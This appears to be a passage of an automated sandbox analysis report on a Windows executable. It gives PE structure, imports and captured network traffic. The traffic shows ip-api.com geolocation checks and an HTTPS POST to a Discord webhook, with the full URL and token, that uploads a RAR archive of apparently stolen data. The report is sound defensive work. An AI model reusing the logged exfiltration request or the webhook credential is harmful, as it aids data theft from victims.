                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x940.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x77a1ee0x2448
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                  .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rdata0x2b0000x12a280x12c00f3bd08fa9607253f10f39407aac39507False0.5243229166666666data5.750755153198856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rsrc0x470000x9400xa008b1cef7be850248ceacb32298558d9c9False0.426953125data5.114581456168053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                  RT_VERSION0x470a00x390data0.4594298245614035
                                                                                                                                                                                                                                                                  RT_MANIFEST0x474300x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                  USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                                  COMCTL32.dll
                                                                                                                                                                                                                                                                  KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                                                  ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                                  GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.192972898 CET4970880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.197830915 CET8049708208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.197915077 CET4970880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.198021889 CET4970880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.202716112 CET8049708208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.674098015 CET8049708208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.674797058 CET4970880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.679802895 CET8049708208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.680094957 CET4970880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.498275995 CET4990880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.503139019 CET8049908208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.505737066 CET4990880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.507232904 CET4990880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.511996984 CET8049908208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.009412050 CET8049908208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.061692953 CET4990880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.220665932 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.220704079 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.220879078 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.244915962 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.244935036 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.703036070 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.703512907 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.703526974 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.704608917 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.704879045 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.706017017 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.706077099 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.706325054 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.706336975 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.706402063 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.706437111 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.707968950 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.707993031 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.708193064 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.708219051 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.711785078 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.711800098 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.711813927 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.711829901 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712017059 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712023020 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712033987 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712042093 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712054968 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712064981 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712112904 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712121964 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712130070 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712137938 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712152958 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712172031 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712202072 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712209940 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712223053 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712233067 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712244034 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712255955 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712271929 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712277889 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712290049 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712301970 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712313890 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712328911 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712338924 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712347031 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712372065 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712383032 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712421894 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712434053 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712459087 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712490082 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712498903 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712511063 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712537050 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712544918 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712605953 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712666988 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712680101 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712692022 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712753057 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.712768078 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718178034 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718372107 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718380928 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718391895 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718422890 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718436003 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718473911 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718498945 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718545914 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718554974 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718568087 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718575954 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718592882 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718601942 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718667030 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718681097 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718693972 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718770981 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.718907118 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.721143961 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.368621111 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.368705034 CET44349913162.159.137.232192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.368758917 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.369402885 CET49913443192.168.2.7162.159.137.232
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.606484890 CET4990880192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.611466885 CET8049908208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:51.611561060 CET4990880192.168.2.7208.95.112.1

                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:12.238410950 CET5803953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:12.247627020 CET53580391.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.183485985 CET5892553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.190296888 CET53589251.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.488965034 CET5231853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.495897055 CET53523181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.213215113 CET6188853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.219778061 CET53618881.1.1.1192.168.2.7

                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:12.238410950 CET192.168.2.71.1.1.10xa512Standard query (0)blank-ivnd9.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.183485985 CET192.168.2.71.1.1.10x9241Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.488965034 CET192.168.2.71.1.1.10xf7e5Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.213215113 CET192.168.2.71.1.1.10xd047Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:12.247627020 CET1.1.1.1192.168.2.70xa512Name error (3)blank-ivnd9.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.190296888 CET1.1.1.1192.168.2.70x9241No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.495897055 CET1.1.1.1192.168.2.70xf7e5No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.219778061 CET1.1.1.1192.168.2.70xd047No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.219778061 CET1.1.1.1192.168.2.70xd047No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.219778061 CET1.1.1.1192.168.2.70xd047No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.219778061 CET1.1.1.1192.168.2.70xd047No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.219778061 CET1.1.1.1192.168.2.70xd047No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                  • discord.com
                                                                                                                                                                                                                                                                  • ip-api.com

                                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.749708208.95.112.1803800C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.198021889 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:15.674098015 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sun, 05 Jan 2025 06:19:15 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 6
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-Ttl: 60
                                                                                                                                                                                                                                                                  X-Rl: 44
                                                                                                                                                                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                                  Data Ascii: false


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.749908208.95.112.1803800C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:49.507232904 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                                  Jan 5, 2025 07:19:50.009412050 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sun, 05 Jan 2025 06:19:49 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 204
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-Ttl: 25
                                                                                                                                                                                                                                                                  X-Rl: 42
                                                                                                                                                                                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.749913162.159.137.2324433800C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC302OUTPOST /api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb6wbSS5zj82QNtaz9Su_0D HTTP/1.1
                                                                                                                                                                                                                                                                  Host: discord.com
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Length: 755602
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=37a76d34b53131452d6fc832f167ffc7
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 2d 2d 33 37 61 37 36 64 33 34 62 35 33 31 33 31 34 35 32 64 36 66 63 38 33 32 66 31 36 37 66 66 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 66 72 6f 6e 74 64 65 73 6b 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 da 7f d0 7b 21 04 00 00 01 0f 97 c7 22 e7 49 45 1e 3c 3d 5c 96 a5 de b5 91 e2 41 43 1e 40 82 b7 23 dd d6 56 8b e2 ca 02 3c 85 ed a2 03 7f 29 49 61 20 a7 ec c2 de 3a 6d f5 06 5e ba b5 b8 73 d0 43 ab 9a 5e 34 f8 46 ab 9b 41 26 63 09 7b 16 73 43 70 8d 98 0d 15 7d 10 a5 20 3f 1d
                                                                                                                                                                                                                                                                  Data Ascii: --37a76d34b53131452d6fc832f167ffc7Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!{!"IE<=\AC@#V<)Ia :m^sC^4FA&c{sCp} ?
